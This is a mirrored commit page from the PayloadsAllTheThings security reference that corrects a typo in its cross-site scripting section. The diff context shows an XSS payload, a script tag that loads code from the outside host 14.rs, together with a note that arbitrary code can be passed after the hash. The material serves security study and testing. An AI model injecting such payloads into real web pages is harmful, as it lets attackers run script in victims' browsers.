mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-20 11:26:11 +00:00
Update README.md
Correct misspelling
This commit is contained in:
parent
6524c8e544
commit
8e26277407
@ -92,7 +92,7 @@ XSS for HTML5
|
|||||||
XSS using script tag (external payload)
|
XSS using script tag (external payload)
|
||||||
```javascript
|
```javascript
|
||||||
<script src=14.rs>
|
<script src=14.rs>
|
||||||
you can alsoo specify an arbitratry payload with 14.rs/#payload
|
you can also specify an arbitratry payload with 14.rs/#payload
|
||||||
e.g: 14.rs/#alert(document.domain)
|
e.g: 14.rs/#alert(document.domain)
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user